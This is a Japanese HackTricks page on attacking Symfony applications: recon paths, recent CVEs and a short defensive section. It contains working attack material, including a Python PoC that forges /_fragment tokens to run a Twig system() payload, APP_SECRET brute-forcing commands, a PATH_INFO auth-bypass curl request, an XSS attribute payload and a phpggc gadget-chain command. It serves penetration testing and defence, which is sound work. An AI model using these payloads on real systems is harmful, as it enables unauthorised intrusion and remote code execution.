HackTricks
Symfony
Tip
AWSハッキングを学び、実践する:
HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。
Symfonyは最も広く使われているPHPフレームワークの一つで、エンタープライズ、e-commerce、CMS(Drupal、Shopware、Ibexa、OroCRM … はいずれもSymfonyコンポーネントを組み込んでいます) の評価で頻繁に登場します。本ページは、Symfonyアプリケーションを発見したときにチェックすべき攻撃的なヒント、よくあるミスコンフィギュレーション、最近の脆弱性をまとめたものです。
歴史的メモ: エコシステムの大部分は未だに 5.4 LTS ブランチを稼働させていることが多く(EOL November 2025)。Symfony 7.4 が Nov 2025 に新しいLTSになり、Nov 2029 までセキュリティ修正が提供されます。多くの2024‑2026年のアドバイザリはマイクロリリースでのみ修正されているため、正確なパッチレベルを必ず確認してください。
Recon & Enumeration
Finger-printing
- HTTP response headers:
X-Powered-By: Symfony,X-Debug-Token,X-Debug-Token-Linkまたはsf_redirect,sf_session,MOCKSESSIDで始まるクッキー。 - Source code leaks (
composer.json,composer.lock,/vendor/…) はしばしば正確なバージョンを明らかにします:
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
- Symfony固有のパブリックルート:
/_profiler(Symfony Profiler & debug toolbar)/_wdt/<token>(“Web Debug Toolbar”)/_error/{code}.{_format}(綺麗なエラーページ)/app_dev.php,/config.php,/config_dev.php(pre-4.0 の dev front-controllers)- Wappalyzer、BuiltWith、または ffuf/feroxbuster のワードリスト:
symfony.txt→/_fragment,/_profiler,.env,.htaccessを探す。
Interesting files & endpoints
| Path | Why it matters |
|---|---|
/.env, /.env.local, /.env.prod | 頻繁に誤配置される → APP_SECRET、DB cred、SMTP、AWS keys の leak |
/.git, .svn, .hg | ソース公開 → credentials とビジネスロジックが漏れる |
/var/log/*.log, /log/dev.log | Web-root のミスコンフィグにより stack-traces を公開 |
/_profiler | リクエスト履歴、設定、service container、APP_SECRET(≤ 3.4)を完全に参照可能 |
/_fragment | ESI/HInclude が使うエントリポイント。APP_SECRET を知っていれば悪用可能 |
/vendor/phpunit/phpunit/phpunit | アクセス可能なら PHPUnit RCE(CVE-2017-9841) |
/index.php/_error/{code} | フィンガープリント & 場合によっては例外のトレースを leak |
High-impact Vulnerabilities
1. APP_SECRET disclosure ➜ RCE via /_fragment (aka “secret-fragment”)
- CVE-2019-18889 が元になっていますが、debug が有効のまま放置されたり
.envが公開されていると現代のターゲットでも まだ 見つかります。 - 32文字の
APP_SECRETを知ると、HMAC トークンを作成して内部のrender()コントローラを悪用し任意の Twig を実行できます:
# PoC – requires the secret
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}" # RCE in Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
- 優れた解説とエクスプロイトスクリプト: Ambionics blog(References にリンクあり)。
2. PATH_INFO auth bypass – CVE-2025-64500 (HttpFoundation)
- 5.4.50 未満、6.4.29 未満、7.3.7 未満に影響。パス正規化が先頭の
/を落としてしまい、/admin等を想定したアクセス制御が突破される可能性があります。 - 簡易テスト:
curl -H 'PATH_INFO: admin/secret' https://target/index.php→ 認証なしで管理ルートに到達するなら脆弱です。 - 対策は
symfony/http-foundationをアップグレードするか、フレームワーク全体を修正されたパッチレベルに上げること。
3. MSYS2/Git-Bash argument mangling – CVE-2026-24739 (Process)
- Windows 上で MSYS2 (Git-Bash, mingw) から PHP を実行する環境で 5.4.51 未満、6.4.33 未満、7.3.11 未満、7.4.5 未満、8.0.5 未満が影響。
Processが=を正しくクォートせずパスを破損させるため、破壊的なコマンド(rmdir,del)が意図しないディレクトリを対象にする可能性があります。 - PHP スクリプトをアップロードできるか、Composer/CLI ヘルパーを介して
Processを呼ぶような影響がある場合、=を含む引数(例:E:/=tmp/delete)を用いてパス書き換えを誘発できます。
4. Runtime env/argv injection – CVE-2024-50340 (Runtime)
register_argv_argc=Onで非-SAPI ランタイムを使っていると、細工したクエリ文字列がargv解析を介してAPP_ENV/APP_DEBUGを反転させることがありました。5.4.46 / 6.4.14 / 7.1.7 で修正済み。- ログに
/?--env=prodのようなものが受け入れられているかを探す。
5. URL validation / open redirect – CVE-2024-50345 (HttpFoundation)
- URI の特殊文字がブラウザと同様に検証されておらず、攻撃者制御下のドメインへのリダイレクトを可能にしていました。5.4.46 / 6.4.14 / 7.1.7 で修正。
6. Symfony UX attribute injection – CVE-2025-47946
symfony/ux-twig-componentとsymfony/ux-live-componentの 2.25.1 未満は{{ attributes }}をエスケープせずレンダリングするため、attribute injection/XSS を引き起こします。アプリがコンポーネント属性をユーザに定義させている(CMSの管理画面、メールテンプレートなど)場合、スクリプト注入に連鎖できます。- 両パッケージを 2.25.1+ に更新してください。手動の悪用としては、カスタムコンポーネントに渡される属性値に JS を仕込み、レンダリングを誘発する方法があります。
7. Windows Process Hijack – CVE-2024-51736 (Process)
Processコンポーネントが Windows でPATHより先にカレントワーキングディレクトリを検索していました。書き込み可能な web-root にtar.exe,cmd.exeなどをアップロードでき、Processをトリガー(ファイル展開、PDF 生成など)するとコマンド実行を得られる可能性があります。- 5.4.50, 6.4.14, 7.1.7 で修正済み。
8. Session-Fixation – CVE-2023-46733
- Authentication guard がログイン後に既存のセッションIDを再利用していました。攻撃者が被害者の認証前にクッキーを設定すると、ログイン後にアカウントを乗っ取れます。
9. Twig sandbox XSS – CVE-2023-46734
- ユーザ制御可能なテンプレートを公開するアプリ(管理CMS、メールビルダー等)で、
nl2brフィルタがサンドボックスを回避して JS を注入できる場合がありました。
10. Symfony 1 gadget chains (still found in legacy apps)
phpggc symfony/1 system idは、sfNamespacedParameterHolderのようなクラスで unserialize() が実行されると RCE を引き起こす Phar ペイロードを生成します。ファイルアップロードのエンドポイントやphar://ラッパーをチェックしてください。
PHP - Deserialization + Autoload Classes
Exploitation Cheat-Sheet
/_fragment 用の HMAC トークンを計算する
python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"
Bruteforce: 弱い APP_SECRET を総当たり
cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
公開された Symfony Console を介した RCE
もし bin/console が php-fpm 経由または直接 CLI アップロードでアクセス可能なら:
php bin/console about # confirm it works
php bin/console cache:clear --no-warmup
キャッシュディレクトリ内に deserialization gadgets を配置するか、次のリクエストで実行される悪意のある Twig テンプレートを作成します。
PATH_INFO バイパスを素早く検証する (CVE-2025-64500)
curl -i -H 'PATH_INFO: admin/secret' https://target/index.php
# If it returns protected content without redirect/auth, the Request normalization is vulnerable.
Spray UX attribute injection (CVE-2025-47946)
{# attacker-controlled attribute value #}
<live:button {{ attributes|merge({'onclick':'alert(1)'}) }} />
レンダリングされた出力が属性をエスケープせずにそのまま出力すると、XSSが成功します。2.25.1以上にパッチを当ててください。
防御の注意点
- 絶対に debug を本番にデプロイしない(
APP_ENV=dev,APP_DEBUG=1);webサーバ設定で/app_dev.php,/_profiler,/_wdtをブロックしてください。 - 秘密情報は環境変数または
vault/secrets.local.phpに保存し、ドキュメントルートからアクセス可能なファイルに決して置かないでください。 - パッチ管理を徹底する — Symfony のセキュリティアドバイザリを購読し、少なくとも LTS のパッチレベルを維持する(5.4.x は 2025年11月まで、6.4 は 2027年11月まで、7.4 は 2029年11月まで)。
- Windows 上で稼働している場合は、CVE-2024-51736 および CVE-2026-24739 を軽減するために直ちにアップグレードするか、
open_basedir/disable_functionsによる防御層を追加してください。
有用な offensive tooling
- ambionics/symfony-exploits – secret-fragment RCE、デバッガールートの発見。
- phpggc – Ready-made gadget chains for Symfony 1 & 2。
- sf-encoder –
_fragmentの HMAC を計算する小さなヘルパー(Go 実装)。
参考資料
- Ambionics – Symfony “secret-fragment” Remote Code Execution
- Symfony Security Advisory – CVE-2024-51736: Command Execution Hijack on Windows Process Component
- Symfony Blog – CVE-2025-47946: Unsanitized HTML attribute injection in UX components
- Symfony Blog – CVE-2026-24739: Incorrect argument escaping under MSYS2/Git Bash
Tip
AWSハッキングを学び、実践する:
GCPハッキングを学び、実践する:HackTricksをサポートする
- サブスクリプションプランを確認してください!
- **💬 Discordグループまたはテレグラムグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。